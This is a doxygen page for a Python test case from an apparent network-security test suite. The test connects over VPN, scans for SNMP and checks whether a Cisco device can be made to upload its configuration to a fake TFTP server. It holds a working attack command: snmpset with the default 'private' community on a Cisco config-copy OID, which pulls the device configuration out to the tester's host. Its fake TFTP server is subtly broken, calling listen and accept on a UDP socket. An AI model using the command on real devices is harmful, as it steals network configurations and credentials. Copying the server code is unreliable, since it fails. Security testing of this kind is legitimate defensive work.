TestMibVpn.py

Go to the documentation of this file.
00001 ##
00002 # 
00003 # Test case: security.remoteaccess.neexploit.TestMibVpn
00004 # 
00005 from testenv.core.TestCase import TestCase
00006 
00007 import os.path
00008 import socket
00009 
00010 from threading import Thread
00011 
00012 ##
00013 # 
00014 #       Simple fake TFTP server
00015 #       
00016 class FakeTftpServer(Thread):
00017         connected = 0
00018         
00019         def __init__(self):
00020                 #init thread
00021                 Thread.__init__(self)
00022                 
00023         def run(self):
00024                 udpSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
00025                 host = socket.gethostbyname(socket.gethostname())
00026                 udpSock.bind((host, 69))
00027                 udpSock.settimeout(30)
00028                 udpSock.listen(1)
00029                 conn, addr = udpSock.accept()
00030                 self.connected = 1
00031                 conn.close()
00032                 udpSock.close()
00033         
00034 
00035 ##
00036 # 
00037 #       Scenario: read/write MIB
00038 #       
00039 #       This test opens a VPN connection to the target network and afterwards tries to download the config file of a Cisco devise to a fake TFTP server.
00040 #       
00041 #       @ingroup test_case_all
00042 #       
00043 class TestMibVpn(TestCase):
00044         
00045         ##
00046         # 
00047         #               This function is called by the __init__ function from the parent.
00048         #               Don't define your own __init__ here!
00049         #               
00050         def initTestCase(self):
00051 
00052                 #set description to identify test case in output
00053                 self.setDescription("read write MIB with VPN")
00054 
00055 
00056         ##
00057         # 
00058         #               implementation of Pread/write MIB check
00059         #               
00060         def test(self):
00061                 
00062                 #get target IP address from config
00063                 targetIp = self.getParameter("configuration.local.target.ip")
00064                 #get network interface to use from config
00065                 localDevice = self.getParameter("configuration.local.interface")
00066                 #get IP address of network interface
00067                 localIp = self.getIpAddress(localDevice)
00068                 #path for config file
00069                 configFileName = os.path.join(self.getLogFilePath(), "config.file")
00070                 
00071                 #snmpset parameter list
00072                 args = ["-c", "private", targetIp, ".1.3.6.1.4.1.9.2.1.55." + localIp, "s", configFileName]
00073                 
00074                 #nmap parameter list
00075                 nmapArgs = ["-p161", targetIp]
00076                 
00077                 #define port scan
00078                 nmapTest = self.newTest("nmap", "portscan", {'arguments' : nmapArgs})
00079                 
00080                 #define VPN connection
00081                 testVpnStart = self.newTest("seg", "vpn start", None)
00082                 testVpnStop = self.newTest("seg", "vpn stop", None)
00083 
00084                 #define test
00085                 test = self.newTest("snmpset", "download config", {'arguments' : args})
00086                 
00087                 #start VPN connection
00088                 testVpnStart.set("mode", "start")
00089                 testVpnStart.start()
00090                 testVpnStart.join()
00091                                 
00092                 #run port scan
00093                 nmapTest.start()
00094                 nmapTest.join()
00095                 
00096                 #get results from port scan
00097                 nmapTestResult = self.getResult("portscan")
00098                 hosts = nmapTestResult.getValue("hosts")
00099 
00100                 tftpRequestReceived = 0
00101 
00102                 #run test only if ports are open
00103                 if len(hosts) > 0:
00104                         for host in hosts:
00105                                 #start fake TFTP server
00106                                 tftp = FakeTftpServer()
00107                                 tftp.start()
00108                                 #run snmpset
00109                                 test.start()
00110                                 test.join()
00111                                 #wait fake TFTP server to end
00112                                 tftp.join()
00113                                 #check whether the target tried to send its config file
00114                                 if tftp.connected == 1:
00115                                         tftpRequestReceived = 1
00116                 
00117                 #shutdown VPN connection
00118                 testVpnStop.set("mode", "stop")
00119                 testVpnStop.start()
00120                 testVpnStop.join()
00121 
00122                 #assert that target did not try to send its config file
00123                 assert tftpRequestReceived == 0
00124 
00125 

Generated on Mon Aug 11 17:28:28 2008 for TestEnv by  doxygen 1.5.5